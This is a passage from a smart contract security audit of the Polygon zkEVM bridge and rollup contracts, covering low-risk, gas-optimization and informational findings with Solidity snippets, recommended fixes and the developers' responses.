Recommendation: Optimize the function _updateBatchFee() and/or check the available amount of gas and simplify the algorithm to update the batchFee. 11 As suggested by the project, the following optimization below could be made. This will alleviate the problem because only a limited amount of batches will be below target. The bulk will be above target, but they won’t be looped over. // Check if timestamp is above or below the VERIFY_BATCH_TIME_TARGET if ( block.timestamp - currentSequencedBatchData.sequencedTimestamp < // Notice the changed < veryBatchTimeTarget ) { totalBatchesBelowTarget += // Notice now it's Below currentBatch - currentSequencedBatchData.previousLastBatchSequenced; } else { break; // Since the rest of batches will be above! ^^ } Polygon-Hermez: Solved in PR 90. Spearbit: Verified. 5.2.10 Keep precision in _updateBatchFee() Severity: Low Risk Context: PolygonZkEVM.sol#L839-L908 Description: Function _updateBatchFee() uses a trick to prevent losing precision in the calculation of accDivi- sor. The value accDivisor includes an extra multiplication with batchFee, which is undone when doing batchFee = (batchFee * batchFee) / accDivisor because this also contains an extra multiplication by batchFee. However, if batchFee happens to reach a small value (also see issue Minimum and maximum value for batch- Fee) then the trick doesn’t work that well. In the extreme case of batchFee ==0 then a division by 0 will take place, resulting in a revert. Luckily this doesn’t happen in practice. function _updateBatchFee(uint64 newLastVerifiedBatch) internal { ... uint256 accDivisor = (batchFee * (uint256(multiplierBatchFee) ** diffBatches)) / (10 ** (diffBatches * 3)); batchFee = (batchFee * batchFee) / accDivisor; ... ,→ } Recommendation: Replace the multiplication factor with a fixed and sufficiently large value. For example in the following way: function _updateBatchFee(uint64 newLastVerifiedBatch) internal { ... uint256 accDivisor = (batchFee * (uint256(multiplierBatchFee) ** diffBatches)) / (10 ** (diffBatches * 3)); batchFee = (batchFee * batchFee) / accDivisor; uint256 accDivisor = (1E18 * (uint256(multiplierBatchFee) ** diffBatches)) / (10 ** (diffBatches * 3)); batchFee = (1E18 * batchFee) / accDivisor; ... - ,→ - + ,→ + } Polygon-Hermez: Solved in PR 90. Spearbit: Verified. 12 5.2.11 Minimum and maximum value for batchFee Severity: Low Risk Context: PolygonZkEVM.sol#L839-L908 Description: Function _updateBatchFee() updates the batchFee depending on the batch time target. If the batch times are repeatedly below or above the target, the batchFee could shrink or grow unlimited. If the batchFee would get too low, problems with the economic incentives might arise. If the batchFee would get too high, overflows might occur. Also, the fee might too be high to be practically payable. Although not very likely to occur in practice, it is probably worth the trouble to implement limits. function _updateBatchFee(uint64 newLastVerifiedBatch) internal { ... if (totalBatchesBelowTarget < totalBatchesAboveTarget) { ... batchFee = (batchFee * (uint256(multiplierBatchFee) ** diffBatches)) / (10 ** (diffBatches * ,→ 3)); } else { ... uint256 accDivisor = (batchFee * (uint256(multiplierBatchFee) ** diffBatches)) / (10 ** (diffBatches * 3)); ,→ batchFee = (batchFee * batchFee) / accDivisor; } } Recommendation: Consider implementing a minimum and maximum value for batchFee. Polygon-Hermez: Solved in PR 90. Spearbit: Verified. 5.2.12 Bridge deployment will fail if initialize() is front-run Severity: Low Risk Context: deployContracts.js By default, Hardhat will deploy transparent upgradeable proxies when calling up- Description: grades.deployProxy() with no type specified. This function accepts data which is used to initialize the state of the contract being deployed. However, because the zkEVM bridge script utilizes the output of each contract address on deployment, it is not trivial to atomically deploy and initialize contracts. As a result, there is a small time window available for attackers to front-run calls to initialize the necessary bridge contracts, allowing them to temporarily DoS during the deployment process. Recommendation: Consider pre-calculating all contract addresses prior to proxy deployment so each contract can be initialized atomically. Polygon-Hermez: We are currently deciding the best way to make a deterministic deployment for the bridge but will take this in account for sure. Spearbit: Acknowledged. 13 5.2.13 Add input validation for the setVeryBatchTimeTarget method Severity: Low Risk Context: PolygonZkEVM.sol#L1171-L1176 Description: The setVeryBatchTimeTarget method in PolygonZkEVM accepts a uint64 newVeryBatchTimeTar- get argument to set the veryBatchTimeTarget. This variable has a value of 30 minutes in the initialize method, so it is expected that it shouldn’t hold a very big value as it is compared to timestamps difference in _updateBatchFee. Since there is no upper bound for the value of the newVeryBatchTimeTarget argument, it is possible (for example due to fat-fingering the call) that an admin passes a big value (up to type(uint64).max) which will result in wrong calculation in _updateBatchFee. Recommendation: Add a sensible upper bound for the value of newVeryBatchTimeTarget, for example, 1 day. Polygon-Hermez: Solved in PR 88. Spearbit: Verified. 5.2.14 Single-step process for critical ownership transfer Severity: Low Risk Context: PolygonZkEVM.sol#L1182, OwnableUpgradeable.sol#L74 Description: If the nominated newAdmin or newOwner account is not a valid account, the owner or admin risks locking themselves out. function setAdmin(address newAdmin) public onlyAdmin { admin = newAdmin; emit SetAdmin(newAdmin); } function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } Recommendation: Consider implementing a two-step process where the owner or admin nominates an account, and the nominated account calls an acceptTransfer() function for the transfer to succeed. Polygon-Hermez: Solved for Admin in PR 87. The owner is intended to be a multisig in a bootstrap period, and afterward will be renounced. We consider acceptTransfer() to be an overkill for this address. Spearbit: Verified and Acknowledged. 5.2.15 Ensure no native asset value is sent in payable method that can handle ERC20 transfers as well Severity: Low Risk Context: PolygonZkEVMBridge.sol#L154-L187 Description: The bridgeAsset method of PolygonZkEVMBridge is marked payable as it can work both with the native asset as well as with ERC20 tokens. In the codepath where it is checked that the token is not the native asset but an ERC20 token, it is not validated that the user did not actually provide value to the transaction. The likelihood of this happening is pretty low since it requires a user error but if it does happen then the native asset value will be stuck in the PolygonZkEVMBridge contract. Recommendation: Ensure that no native asset value is sent when the bridged asset is an ERC20 token by adding the following code to the codepath of the ERC20 bridging: require(msg.value == 0, "PolygonZkEVMBridge::bridgeAsset: Expected zero native asset value when bridging ERC20 tokens"); ,→ 14 You can also use an if statement and a custom error instead of a require statement. Polygon-Hermez: Solved in PR 87. Spearbit: Verified. 5.2.16 Calls to the name, symbol and decimals functions will be unsafe for non-standard ERC20 tokens Severity: Low Risk Context: PolygonZkEVMBridge.sol#L181-185 Description: The bridgeAsset method of PolygonZkEVMBridge accepts an address token argument and later calls the name, symbol and decimals methods of it. There are two potential problems with this: 1. Those methods are not mandatory in the ERC20 standard, so there can be ERC20-compliant tokens that do not have either or all of the name, symbol or decimals methods, so they will not be usable with the protocol, because the calls will revert 2. There are tokens that use bytes32 instead of string as the value type of their name and symbol storage vari- ables and their getter functions (example is MKR). This can cause reverts when trying to consume metadata from those tokens. Also, see weird-erc20 for nonstandard tokens. Recommendation: For the first problem, a simple solution is to use a low-level staticcall for those method calls and if they are unsuccessful to use some default values. For the second problem it would be best to again do a low-level staticcall and then use an external library that checks if the returned data is of type string and if not to cast it to such. Also, see MasterChefJoeV3 as an example for a possible solution. Polygon-Hermez: Solved in PR 90 and PR 91. Spearbit: Verified. 5.3 Gas Optimization 5.3.1 Use calldata instead of memory for array parameters Severity: Gas Optimization Context: PolygonZkEVMBridge.sol#L272-L373, PolygonZkEVMBridge.sol#L520-L581, DepositContract.sol#L90- L112 Description: The code frequently uses memory arrays for externally called functions. Some gas could be saved by making these calldata. The calldata can also be cascaded to internal functions that are called from the external functions. function claimAsset(bytes32[] memory smtProof) public { ... _verifyLeaf(smtProof); ... } function _verifyLeaf(bytes32[] memory smtProof) internal { ... verifyMerkleProof(smtProof); ... } function verifyMerkleProof(..., bytes32[] memory smtProof, ...) internal { ... } Recommendation: Consider changing the code to 15 -function claimAsset(bytes32[] memory smtProof) public { +function claimAsset(bytes32[] calldata smtProof) public { ... _verifyLeaf(smtProof); ... } -function _verifyLeaf(bytes32[] memory smtProof) internal { +function _verifyLeaf(bytes32[] calldata smtProof) internal { ... verifyMerkleProof(smtProof); ... } -function verifyMerkleProof(..., bytes32[] memory smtProof, ...) internal { +function verifyMerkleProof(..., bytes32[] calldata smtProof, ...) internal { ... } Polygon-Hermez: Solved in PR 85. Spearbit: Verified. 5.3.2 Optimize networkID == MAINNET_NETWORK_ID Severity: Gas Optimization Context: PolygonZkEVMBridge.sol#L520-L581, PolygonZkEVMBridge.sol#L69-L77 Description: The value for networkID is defined in initialize() and MAINNET_NETWORK_ID is constant. So networkID == MAINNET_NETWORK_ID can be calculated in initialize() and stored to save some gas. It is even cheaper if networkID is immutable, which would require adding a constructor. uint32 public constant MAINNET_NETWORK_ID = 0; uint32 public networkID; function initialize(uint32 _networkID, ...) public virtual initializer { networkID = _networkID; ... } function _verifyLeaf(...) ... { ... if (networkID == MAINNET_NETWORK_ID) { ... } else { ... } } Recommendation: Consider calculating networkID == MAINNET_NETWORK_ID in initialize() or preferable a constructor. Polygon-Hermez: We decided to go for a deterministic deployment for the PolygonZkEVMBridge contract, there- fore we prefer to not use immutables in this contract. When implemented without immutable, the resulting code is less optimal. Spearbit: Acknowledged. 16 5.3.3 Optimize updateExitRoot() Severity: Gas Optimization Context: PolygonZkEVMGlobalExitRoot.sol#L54-L75 Description: The function updateExitRoot() accesses the global variables lastMainnetExitRoot and las- tRollupExitRoot multiple times. This can be optimized using temporary variables. function updateExitRoot(bytes32 newRoot) external { ... if (msg.sender == rollupAddress) { lastRollupExitRoot = newRoot; } if (msg.sender == bridgeAddress) { lastMainnetExitRoot = newRoot; } bytes32 newGlobalExitRoot = keccak256( abi.encodePacked(lastMainnetExitRoot, lastRollupExitRoot) ); if ( ... ) { ... emit UpdateGlobalExitRoot(lastMainnetExitRoot, lastRollupExitRoot); } } Recommendation: Consider changing the code to something like function updateExitRoot(bytes32 newRoot) external { ... bytes32 cm = lastMainnetExitRoot; bytes32 cr = lastRollupExitRoot; if (msg.sender == rollupAddress) { lastRollupExitRoot = cr = newRoot; } if (msg.sender == bridgeAddress) { lastMainnetExitRoot = cm = newRoot; } bytes32 newGlobalExitRoot = keccak256( abi.encodePacked(cm, cr) ); if ( ... ) { ... emit UpdateGlobalExitRoot(cm, cr); } } Polygon-Hermez: Solved in PR 82. Spearbit: Verified. 5.3.4 Optimize _setClaimed() Severity: Gas Optimization Context: PolygonZkEVMBridge.sol#L272-L436, PolygonZkEVMBridge.sol#L520-L581, PolygonZkEVMBridge.sol#L587- L605 Description: The function claimAsset() and claimMessage() first verify !isClaimed() (via the function _veri- fyLeaf()) and then do _setClaimed(). These two functions can be combined in a more efficient version. 17 function claimAsset(...) ... { _verifyLeaf(...); _setClaimed(index); ... } function claimMessage(...) ... { _verifyLeaf(...); _setClaimed(index); ... } function _verifyLeaf(...) ... { require( !isClaimed(index), ...); ... } function isClaimed(uint256 index) public view returns (bool) { uint256 claimedWordIndex = index / 256; uint256 claimedBitIndex = index % 256; uint256 claimedWord = claimedBitMap[claimedWordIndex]; uint256 mask = (1 << claimedBitIndex); return (claimedWord & mask) == mask; } function _setClaimed(uint256 index) private { uint256 claimedWordIndex = index / 256; uint256 claimedBitIndex = index % 256; claimedBitMap[claimedWordIndex] = claimedBitMap[claimedWordIndex] | (1 << claimedBitIndex); } Recommendation: The following suggestion is based on Uniswap permit2 bitmap: Replace the duo of isClaimed() and _setClaimed() with the following function _setAndCheckClaimed(). This could be either inside or outside of _verifyLeaf(). function _setAndCheckClaimed(uint256 index) private { (uint256 wordPos, uint256 bitPos) = _bitmapPositions(index); uint256 mask = 1 << bitPos; uint256 flipped = claimedBitMap[wordPos] ^= mask; require (flipped & mask != 0,"PolygonZkEVMBridge::_verifyLeaf: Already claimed"); } function _bitmapPositions(uint256 index) private pure returns (uint256 wordPos, uint256 bitPos) { wordPos = uint248(index >> 8); bitPos = uint8(index); } Note: update the error message, depending on whether it will be called inside or outside of _verifyLeaf() If the status of the bits has to be retrieved from the outside, add the following function: function isClaimed(uint256 index) external view returns (bool) { (uint256 wordPos, uint256 bitPos) = _bitmapPositions(index); uint256 mask = (1 << bitPos); return ( claimedBitMap[wordPos] & mask) == mask; } Polygon-Hermez: Solved in PR 82. Spearbit: Verified. 18 5.3.5 SMT branch comparisons can be optimised Severity: Gas Optimization Context: DepositContract.sol#L99-L109, DepositContract.sol#L65-L77, DepositContract.sol#L30-L46 Description: When verifying a merkle proof, the search does not terminate until we have iterated through the tree depth to calculate the merkle root. The path is represented by the lower 32 bits of the index variable where each bit represents the direction of the path taken. Two changes can be made to the following snippet of code: • Bit shift currentIndex to the right instead of dividing by 2. • Avoid overwriting the currentIndex variable and perform the bitwise comparison in-line. function verifyMerkleProof( ... uint256 currrentIndex = index; for ( uint256 height = 0; height < _DEPOSIT_CONTRACT_TREE_DEPTH; height++ ) { } if ((currrentIndex & 1) == 1) node = keccak256(abi.encodePacked(smtProof[height], node)); else node = keccak256(abi.encodePacked(node, smtProof[height])); currrentIndex /= 2; Recommendation: Consider changing the code to function verifyMerkleProof( ... uint256 currrentIndex = index; for ( uint256 height = 0; height < _DEPOSIT_CONTRACT_TREE_DEPTH; height++ ) { if ((currrentIndex & 1) == 1) if (((index >> height) & 1) == 1) node = keccak256(abi.encodePacked(smtProof[height], node)); else node = keccak256(abi.encodePacked(node, smtProof[height])); currrentIndex /= 2; - + - } This same optimization can also be applied to similar instances found in _deposit() and getDepositRoot(). Polygon-Hermez: Solved in PR 88. Spearbit: Verified. 19 5.3.6 Increments can be optimised by pre-fixing variable with ++ Severity: Gas Optimization Context: DepositContract.sol#L64 Description: There are small gas savings in performing when pre-fixing increments with ++. Sometimes this can be used to combine multiple statements, like in function _deposit(). function _deposit(bytes32 leafHash) internal { ... depositCount += 1; uint256 size = depositCount; ... } Other occurrences of ++: PolygonZkEVM.sol: PolygonZkEVM.sol: PolygonZkEVM.sol: PolygonZkEVM.sol: PolygonZkEVM.sol: PolygonZkEVM.sol: PolygonZkEVM.sol: PolygonZkEVM.sol: lib/DepositContract.sol: lib/DepositContract.sol: { ,→ lib/DepositContract.sol: { ,→ lib/TokenWrapped.sol: verifiers/Verifier.sol: verifiers/Verifier.sol: verifiers/Verifier.sol: for (uint256 i = 0; i < batchesNum; i++) { currentLastForceBatchSequenced++; currentBatchSequenced++; lastPendingState++; lastForceBatch++; for (uint256 i = 0; i < batchesNum; i++) { currentLastForceBatchSequenced++; currentBatchSequenced++; height++ for (uint256 height = 0;height < _DEPOSIT_CONTRACT_TREE_DEPTH;height++) for (uint256 height = 0;height < _DEPOSIT_CONTRACT_TREE_DEPTH;height++) nonces[owner]++, for (uint i = 0; i < elements; i++) { for (uint i = 0; i < input.length; i++) { for (uint i = 0; i < input.length; i++) { Recommendation: Consider pre-fixing all variables where ++ is used. Combine statement where possible and it doesn’t reduce readability. function _deposit(bytes32 leafHash) internal { ... uint256 size = ++depositCount; ... } Polygon-Hermez: Solved partially in PR 82. Some exceptions where it would make the code less readable or it wouldn’t save gas. Spearbit: Verified. 20 5.3.7 Move initialization values from initialize() to immutable via constructor Severity: Gas Optimization Context: PolygonZkEVM.sol#L337-L370, PolygonZkEVMBridge.sol#L69-L77 Description: The contracts PolygonZkEVM and PolygonZkEVMBridge initialize variables via initialize(). If these variables are never updated they could also be made immutable, which would save some gas. In order to achieve that, a constructor has to be added to set the immutable variables. This could be applicable for chainID in contract PolygonZkEVM and networkID in contract PolygonZkEVMBridge contract PolygonZkEVM is ... { ... uint64 public chainID; ... function initialize(...) ... { ... chainID = initializePackedParameters.chainID; ... } contract PolygonZkEVMBridge is ... { ... uint32 public networkID; ... function initialize(uint32 _networkID,...) ... { networkID = _networkID; ... } Recommendation: Consider making variables immutable and add a constructor to initialize these variables. Polygon-Hermez: Implemented for PolygonZkEVM in PR 88. Not implemented for PolygonZkEVMBridge because it will be deployed with the same address on different chains via CREATE2. In that case it is easier if the initBytecode is the same and thus its easier to stay with initial- ize(). Spearbit: Verified and acknowledged. 5.3.8 Optimize isForceBatchAllowed() Severity: Gas Optimization Context: PolygonZkEVM.sol#L393-L399 Description: The modifier isForceBatchAllowed() includes a redundant check == true. This can be optimized to save some gas. modifier isForceBatchAllowed() { require(forceBatchAllowed == true, ... ); _; } Recommendation: Consider changing the code to modifier isForceBatchAllowed() { - + require(forceBatchAllowed == true, ... ); require(forceBatchAllowed, ... ); _; } 21 Polygon-Hermez: We decide to erase this modifier, this was intended to be present only in testnet, when the forced Batches were not supported yet by the node and prover, this won’t be necessary anymore. It’s a requirement that even the admin won’t be able to censor the system. Spearbit: Verified. 5.3.9 Optimize loop in _updateBatchFee() Severity: Gas Optimization Context: PolygonZkEVM.sol#L839-L908 Description: The function _updateBatchFee() uses the following check in a loop: - currentSequencedBatchData.sequencedTimestamp > veryBatchTimeTarget. block.timestamp - veryBatchTimeTarget > currentSequencedBatchData.sequencedTimestamp block.timestamp The is the same as: As block.timestamp - veryBatchTimeTarget is constant during the execution of this function, it can be taken outside the loop to save some gas. function _updateBatchFee(uint64 newLastVerifiedBatch) internal { ... while (currentBatch != currentLastVerifiedBatch) { ... if ( block.timestamp - currentSequencedBatchData.sequencedTimestamp > veryBatchTimeTarget ) { ... } } } Recommendation: Consider optimizing the loop by storing the value of block.timestamp - veryBatchTimeTar- get in a temporary variable and use that in the comparison. Polygon-Hermez: Solved in PR 90. Spearbit: Verified. 5.3.10 Optimize multiplication Severity: Gas Optimization Context: PolygonZkEVM.sol#L888 Description: The multiplication in function _updateBatchFee can be optimized to save some gas. Recommendation: Consider changing the code to: +unchecked { - + +} (10 ** (diffBatches * 3)) (1000 ** diffBatches) Note: the gas saving is only received when using unchecked and is very minimal, so double-check it is worth the trouble. Polygon-Hermez: Solved in PR 90. Spearbit: Verified. 22 5.3.11 Changing constant storage variables from public to private will save gas Severity: Gas Optimization Context: PolygonZkEVM.sol#L114-L127, PolygonZkEVMBridge.sol#L38-L44, TokenWrapped.sol#L9-L20 Description: Usually constant variables are not expected to be read on-chain and their value can easily be seen by looking at the source code. For this reason, there is no point in using public for a constant variable since it auto-generates a getter function which increases deployment cost and sometimes function call cost. Recommendation: Replace all public constant occurrences referenced with private constant to save gas. Polygon-Hermez: The public constants of the TokenWrapped can be useful on both Front ends implementations or another contract, as can be seen in the implementation of permit2 of uniswap. The rest of the constants are changed in PR 85. Spearbit: Verified. 5.3.12 Storage variables not changeable after deployment can be immutable Severity: Gas Optimization Context: Mentioned in Recommendation Description: If a storage variable is not changeable after deployment (set in the constructor) it can be turned into an immutable variable to save gas. Recommendation: • PolygonZkEVMGlobalExitRoot.sol#L6-L48 - import "@openzeppelin/contracts-upgradeable/proxy/utils/Initializable.sol"; - address public bridgeAddress; - address public rollupAddress; + address public immutable bridgeAddress; + address public immutable rollupAddress; - function initialize(address _rollupAddress,address _bridgeAddress) public initializer { + constructor(address _rollupAddress,address _bridgeAddress) { rollupAddress = _rollupAddress; bridgeAddress = _bridgeAddress; } • PolygonZkEVMGlobalExitRootL2.sol#L27 - address public bridgeAddress; + address public immutable bridgeAddress; • PolygonZkEVMTimelock.sol#L14 - PolygonZkEVM public polygonZkEVM; + PolygonZkEVM public immutable polygonZkEVM; • TokenWrapped.sol#L29-L32 - address public bridgeAddress; + address public immutable bridgeAddress; ... - uint8 private _decimals; + uint8 private immutable _decimals; Polygon-Hermez: Solved in PR 88. Spearbit: Verified. 23 5.3.13 Optimize check in _consolidatePendingState() Severity: Gas Optimization Context: PolygonZkEVM.sol#L799-L832 Description: The check in function _consolidatePendingState() can be optimized to save some gas. As last- PendingStateConsolidated is of type uint64 and thus is at least 0, the check pendingStateNum > lastPend- ingStateConsolidated makes sure pendingStateNum > 0. So the explicit check for pendingStateNum != 0 isn’t necessary. uint64 public lastPendingStateConsolidated; function _consolidatePendingState(uint64 pendingStateNum) internal { require( pendingStateNum != 0 && pendingStateNum > lastPendingStateConsolidated && pendingStateNum <= lastPendingState, "PolygonZkEVM::_consolidatePendingState: pendingStateNum invalid" ); ... } Recommendation: Consider changing the code to function _consolidatePendingState(uint64 pendingStateNum) internal { require( pendingStateNum != 0 && pendingStateNum > lastPendingStateConsolidated && // pendingStateNum can't be 0 pendingStateNum <= lastPendingState, "PolygonZkEVM::_consolidatePendingState: pendingStateNum invalid" - } ); ... Polygon-Hermez: Solved in PR 87. Spearbit: Verified. 5.3.14 Custom errors not used Severity: Gas Optimization Context: PolygonZkEVM.sol#L373 Description: Custom errors lead to cheaper deployment and run-time costs. Recommendation: For a cheaper gas cost, consider using custom errors throughout the whole project. Polygon-Hermez: Solved in PR 90. Spearbit: Verified. 24 5.3.15 Variable can be updated only once instead of on each iteration of a loop Severity: Gas Optimization Context: PolygonZkEVM.sol#L495, PolygonZkEVM.sol#L1039 Description: In functions sequenceBatches() and sequenceForceBatches(), the currentBatchSequenced vari- able is increased by 1 on each iteration of the loop but is not used inside of it. This means that instead of doing batchesNum addition operations, you can do it only once, after the loop. Recommendation: Delete the currentBatchSequenced++; line and just do currentBatchSequenced += batch- esNum; right after the loop. Polygon-Hermez: Solved in PR 87. Spearbit: Verified. 5.3.16 Optimize emits in sequenceBatches() and sequenceForceBatches() Severity: Gas Optimization Context: PolygonZkEVM.sol#L409-L533, PolygonZkEVM.sol#L972-L1054 Description: The emits in functions sequenceBatches() and sequenceForceBatches() could be gas optimized by using the tmp variables which have been just been stored in the emited global variables. function sequenceBatches(...) ... { ... lastBatchSequenced = currentBatchSequenced; ... emit SequenceBatches(lastBatchSequenced); } function sequenceForceBatches(...) ... { ... lastBatchSequenced = currentBatchSequenced; ... emit SequenceForceBatches(lastBatchSequenced); } Recommendation: Consider changing the code to: function sequenceBatches(...) ... { ... lastBatchSequenced = currentBatchSequenced; ... emit SequenceBatches(lastBatchSequenced); emit SequenceBatches(currentBatchSequenced); - + } function sequenceForceBatches(...) ... { ... lastBatchSequenced = currentBatchSequenced; ... emit SequenceForceBatches(lastBatchSequenced); emit SequenceForceBatches(currentBatchSequenced); - + } Polygon-Hermez: Solved in PR 85. Spearbit: Verified. 25 5.3.17 Only update lastForceBatchSequenced if nessary in function sequenceBatches() Severity: Gas Optimization Context: PolygonZkEVM.sol#L409-L533 Description: The function sequenceBatches() writes back to lastForceBatchSequenced, however this is only necessary if there are forced batches. This could be optimized to save some gas and at the same time the calculation of nonForcedBatchesSequenced could also be optimized. function sequenceBatches(...) ... { ... uint64 currentLastForceBatchSequenced = lastForceBatchSequenced; ... if (currentBatch.minForcedTimestamp > 0) { currentLastForceBatchSequenced++; ... uint256 nonForcedBatchesSequenced = batchesNum - (currentLastForceBatchSequenced - lastForceBatchSequenced); ... lastForceBatchSequenced = currentLastForceBatchSequenced; ... ,→ } Recommendation: Consider changing the code to something like the following. Do check if the gas savings are worth the trouble. function sequenceBatches(...) ... { ... uint64 currentLastForceBatchSequenced = lastForceBatchSequenced; uint64 orgLastForceBatchSequenced = currentLastForceBatchSequenced; ... if (currentBatch.minForcedTimestamp > 0) { currentLastForceBatchSequenced++; ... uint256 nonForcedBatchesSequenced = batchesNum - (currentLastForceBatchSequenced - lastForceBatchSequenced); uint256 nonForcedBatchesSequenced = batchesNum - (currentLastForceBatchSequenced - orgLastForceBatchSequenced); ... if (currentLastForceBatchSequenced != orgLastForceBatchSequenced) lastForceBatchSequenced = currentLastForceBatchSequenced; ... + - ,→ + ,→ + } Polygon-Hermez: Solved in PR 85. Spearbit: Verified. 26 5.3.18 Delete forcedBatches[currentLastForceBatchSequenced] after use Severity: Gas Optimization Context: PolygonZkEVM.sol#L409-L533, PolygonZkEVM.sol#L972-L1054 Description: The functions sequenceBatches() and sequenceForceBatches() use up the forcedBatches[] and then afterward they are no longer used. Deleting these values might give a gas refund and lower the L1 gas costs. function sequenceBatches(...) ... { ... currentLastForceBatchSequenced++; ... require(hashedForcedBatchData == ... forcedBatches[currentLastForceBatchSequenced],...); } function sequenceForceBatches(...) ... { ... currentLastForceBatchSequenced++; ... require(hashedForcedBatchData == forcedBatches[currentLastForceBatchSequenced],...); ... } Recommendation: Consider deleting the values of forcedBatches[currentLastForceBatchSequenced]. Verify if this indeed saves gas. Polygon-Hermez: Solved in PR 85. Spearbit: Verified. 5.3.19 Calculate keccak256(currentBatch.transactions) once Severity: Gas Optimization Context: PolygonZkEVM.sol#L409-L533, PolygonZkEVM.sol#L972-L1054 Description: cak256(currentBatch.transactions) twice. calculating the keccak256() of it could be relatively expensive. sequenceBatches() functions Both kec- sequenceForceBatches() As the currentBatch.transactions could be rather large, calculate and function sequenceBatches(BatchData[] memory batches) ... { ... if (currentBatch.minForcedTimestamp > 0) { ... bytes32 hashedForcedBatchData = ... keccak256(currentBatch.transactions) ... ... } ... currentAccInputHash = ... keccak256(currentBatch.transactions) ... ... } function sequenceForceBatches(ForcedBatchData[] memory batches) ... { ... bytes32 hashedForcedBatchData = ... keccak256(currentBatch.transactions) ... ... currentAccInputHash = ... keccak256(currentBatch.transactions) ... ... } Recommendation: Consider storing the result of keccak256(currentBatch.transactions) in a temporary vari- able and reuse it later on. 27 Polygon-Hermez: Solved in PR 85. Spearbit: Verified. 5.4 Informational 5.4.1 Function definition of onMessageReceived() Severity: Informational Context: IBridgeMessageReceiver.sol#L9-L13, PolygonZkEVMBridge.sol#L388-L436 Description: As discovered by the project: the function definition of onMessageReceived() is view and returns a boolean. Also, it is not payable. The function is meant to receive ETH so it should be payable. Also, it is meant to take action so is shouldn’t be view. The bool return value isn’t used in PolygonZkEVMBridge so isn’t necessary. Because the function is called via a low-level call this doesn’t pose a problem in practice. The current definition is confusing though. interface IBridgeMessageReceiver { function onMessageReceived(...) external view returns (bool); } contract PolygonZkEVMBridge is ... { function claimMessage( ... ) ... { ... (bool success, ) = destinationAddress.call{value: amount}( abi.encodeCall( IBridgeMessageReceiver.onMessageReceived, (originAddress, originNetwork, metadata) ) ); require(success, "PolygonZkEVMBridge::claimMessage: Message failed"); ... } } Recommendation: Change the function definition to the following: - function onMessageReceived(...) external view returns (bool); + function onMessageReceived(...) external payable; Polygon-Hermez: Solved in PR 89. Spearbit: Verified. 5.4.2 batchesNum can be explicitly casted in sequenceForceBatches() Severity: Informational Context: PolygonZkEVM.sol#L987-L990 Description: The sequenceForceBatches() function performs a check to ensure that the sequencer does not sequence forced batches that do not exist. The require statement compares two different types; uint256 and uint64. For consistency, the uint256 can be safely cast down to uint64 as solidity ˆ0.8.0 checks for over- flow/underflow. Recommendation: Consider explicitly casting down batchesNum to uint64. Polygon-Hermez: Solved by casting to uint256 in PR 85. Spearbit: Verified. 28 5.4.3 Metadata are not migrated on changes in l1 contract Severity: Informational Context: PolygonZkEVMBridge.sol#L338-L340 Description: wrapped token’s metadata will not change and would point to the older decimal If metadata changes on mainnet (say decimal change) after wrapped token creation then also 1. Token T1 was on mainnet with decimals 18. 2. This was bridged to rollup R1. 3. A wrapped token is created with decimal 18. 4. On mainnet T1 decimal is changed to 6. 5. Wrapped token on R1 still uses 18 decimals. Recommendation: This behavior needs to be documented so that users are careful while interacting with their L2 counterpart if any such scenario occurs Polygon-Hermez: We consider that this is a very unusual behavior to the point that we are not aware of any token that has changed his metadata ( name/symbol/decimals), even if we could consider that as a malicious token since easily can break multiple dapps or trick users changing any of the metadata fields. We will add a comment that we cannot support an update of the metadata if the original token updates its own metadata. Spearbit: Verified. 5.4.4 Remove unused import in PolygonZkEVMGlobalExitRootL2 Severity: Informational Context: PolygonZkEVMGlobalExitRootL2.sol#L5-L11 Description: The contract PolygonZkEVMGlobalExitRootL2 imports SafeERC20.sol, however, this isn’t used in the contract. import "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol"; contract PolygonZkEVMGlobalExitRootL2 { } Recommendation: Remove the unused import in PolygonZkEVMGlobalExitRootL2. - import "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol"; Polygon-Hermez: Solved in PR 82. Spearbit: Verified. 5.4.5 Switch from public to external for all non-internally called methods Severity: Informational DepositContract.sol#L90, DepositContract.sol#L124, PolygonZkEVMGlobalExitRootL2.sol#L40, PolygonZkEVM- Context: PolygonZkEVMBridge.sol#L69, GlobalExitRoot.sol#L42, PolygonZkEVMBridge.sol#L272, PolygonZkEVMBridge.sol#L129, PolygonZkEVMBridge.sol#L480, PolygonZkEVMBridge.sol#L388, PolygonZkEVM.sol#L337, PolygonZkEVM.sol#L624, PolygonZkEVM.sol#L783, PolygonZkEVM.sol#L920, PolygonZkEVM.sol#L972, PolygonZkEVM.sol#L1064, PolygonZkEVM.sol#L1074, PolygonZkEVM.sol#L1084, PolygonZkEVM.sol#L1097, PolygonZkEVM.sol#L1110, PolygonZkEVM.sol#L1133, PolygonZkEVM.sol#L1155, PolygonZkEVM.sol#L1171, PolygonZkEVM.sol#L1182, PolygonZkEVM.sol#L1204, PolygonZkEVM.sol#L1258 PolygonZkEVMBridge.sol#L222, PolygonZkEVMBridge.sol#L446, PolygonZkEVM.sol#L545, PolygonZkEVM.sol#L409, Verifier.sol#L320, 29 Description: Functions that are not called from inside of the contract should be external instead of public, which prevents accidentally using a function internally that is meant to be used externally. See also issue "Use calldata instead of memory for function parameters". Recommendation: Change the function visibility from public to external for the linked methods. Polygon-Hermez: Solved in PR 85. Note: bridgeAsset() is still public since it’s used in one of the mocks and changing to external has no effect on bytecode length or gas cost. Spearbit: Verified. 5.4.6 Common interface for PolygonZkEVMGlobalExitRoot and PolygonZkEVMGlobalExitRootL2 Severity: Informational Context: PolygonZkEVMGlobalExitRoot.sol#L5, PolygonZkEVMGlobalExitRootL2.sol#L11 Description: The contract PolygonZkEVMGlobalExitRoot inherits from IPolygonZkEVMGlobalExitRoot, while PolygonZkEVMGlobalExitRootL2 doesn’t, although they both implement a similar interface. Note: PolygonZkEVMGlobalExitRoot implements an extra function getLastGlobalExitRoot(). the same interface file would improve the checks by the compiler. Inheriting from import "@openzeppelin/contracts-upgradeable/proxy/utils/Initializable.sol"; contract PolygonZkEVMGlobalExitRoot is IPolygonZkEVMGlobalExitRoot, ... { ... } contract PolygonZkEVMGlobalExitRootL2 { } Recommendation: Consider having a common interface file and an additional interface for the extra function in PolygonZkEVMGlobalExitRoot. Polygon-Hermez: Solved in PR 88. Spearbit: Verified. 5.4.7 Abstract the way to calculate GlobalExitRoot Severity: Informational Context: PolygonZkEVMGlobalExitRoot.sol#L54-L85, PolygonZkEVMBridge.sol#L520-L581 Description: 